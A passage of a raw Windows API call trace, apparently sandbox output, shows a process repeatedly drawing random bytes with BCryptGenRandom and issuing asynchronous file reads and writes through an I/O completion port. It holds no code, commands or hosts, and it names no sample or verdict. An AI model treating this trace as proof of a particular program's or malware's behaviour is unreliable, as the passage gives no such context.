lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0177.445] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0177.450] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x1080, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0177.450] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0177.457] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.457] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.457] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0177.457] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.458] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.458] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0177.458] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.458] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.458] free (_Block=0x3e305b8) [0177.458] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.458] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.459] free (_Block=0x1fa91d0) [0177.459] free (_Block=0x1fa2ed8) [0177.459] free (_Block=0x1fa90b8) [0177.459] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.460] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0177.464] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x1a30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0177.465] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0177.471] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.471] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.471] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0177.471] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.472] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.472] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0177.472] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.472] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.472] free (_Block=0x3e305b8) [0177.472] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.472] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.473] free (_Block=0x1fa91d0) [0177.473] free (_Block=0x1fa2ed8) [0177.473] free (_Block=0x1fa90b8) [0177.473] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0177.475] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0177.485] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.485] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.485] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0177.485] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.486] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.486] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0177.486] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.486] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.486] free (_Block=0x3e305b8) [0177.486] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.486] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.486] free (_Block=0x1fa91d0) [0177.486] free (_Block=0x1fa2ed8) [0177.486] free (_Block=0x1fa90b8) [0177.486] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0177.487] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0177.493] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.494] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.494] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0177.494] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.494] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.494] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0177.494] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.494] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.494] free (_Block=0x3e305b8) [0177.494] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.494] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.495] free (_Block=0x1fa91d0) [0177.495] free (_Block=0x1fa2ed8) [0177.495] free (_Block=0x1fa90b8) [0177.495] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.495] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0177.498] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x36e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0177.499] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0177.507] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.508] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.508] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0177.508] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.508] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.508] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0177.509] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.509] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.509] free (_Block=0x3e305b8) [0177.509] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.509] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.509] free (_Block=0x1fa91d0) [0177.509] free (_Block=0x1fa2ed8) [0177.509] free (_Block=0x1fa90b8) [0177.509] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0177.510] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0177.513] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x2140, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0177.514] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0177.522] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.522] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.522] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0177.522] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.523] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0177.523] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.523] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.523] free (_Block=0x3e305b8) [0177.523] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.523] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.523] free (_Block=0x1fa91d0) [0177.523] free (_Block=0x1fa2ed8) [0177.523] free (_Block=0x1fa90b8) [0177.524] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0177.524] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0177.529] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.529] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0177.529] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.530] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0177.530] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.530] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.530] free (_Block=0x3e305b8) [0177.530] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.530] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.530] free (_Block=0x1fa91d0) [0177.530] free (_Block=0x1fa2ed8) [0177.530] free (_Block=0x1fa90b8) [0177.530] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0177.531] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0177.534] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x1850, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0177.535] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0177.540] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.541] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.541] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0177.541] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.541] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.541] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0177.541] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.541] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.541] free (_Block=0x3e305b8) [0177.541] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.541] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.542] free (_Block=0x1fa91d0) [0177.542] free (_Block=0x1fa2ed8) [0177.542] free (_Block=0x1fa90b8) [0177.542] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0177.542] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0177.543] CloseHandle (hObject=0x338) returned 1 [0177.543] free (_Block=0x3df0008) [0177.544] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0177.612] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1412, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0177.627] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0177.653] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.654] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.654] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0177.654] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.654] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.654] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0177.654] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.654] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.654] free (_Block=0x3e305b8) [0177.654] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.654] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.655] free (_Block=0x1fa91d0) [0177.655] free (_Block=0x1fa2ed8) [0177.655] free (_Block=0x1fa90b8) [0177.655] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0177.656] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0177.740] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.741] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.741] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0177.741] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.741] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.741] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0177.742] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.742] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.742] free (_Block=0x3e305b8) [0177.742] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.742] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.742] free (_Block=0x1fa91d0) [0177.742] free (_Block=0x1fa2ed8) [0177.742] free (_Block=0x1fa90b8) [0177.742] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0177.743] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0177.782] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.782] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.783] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0177.783] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.783] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.783] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0177.783] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.783] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.783] free (_Block=0x3e305b8) [0177.783] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.783] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0177.784] free (_Block=0x1fa91d0) [0177.784] free (_Block=0x77d7a8) [0177.784] free (_Block=0x1fa90b8) [0177.784] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0177.784] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0177.791] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x78a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0177.810] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0177.843] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.844] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.844] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0177.844] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.844] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.844] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0177.844] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.845] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.845] free (_Block=0x3e305b8) [0177.845] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.845] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.845] free (_Block=0x1fa91d0) [0177.845] free (_Block=0x1fa2ed8) [0177.845] free (_Block=0x1fa90b8) [0177.845] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0177.847] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0177.869] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.870] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.870] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0177.870] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.870] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.870] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0177.871] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.871] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.871] free (_Block=0x3e305b8) [0177.871] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.871] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.871] free (_Block=0x1fa91d0) [0177.871] free (_Block=0x1fa2ed8) [0177.871] free (_Block=0x1fa90b8) [0177.871] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0177.873] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0177.898] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.899] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.899] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0177.899] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.904] GetProcAddress 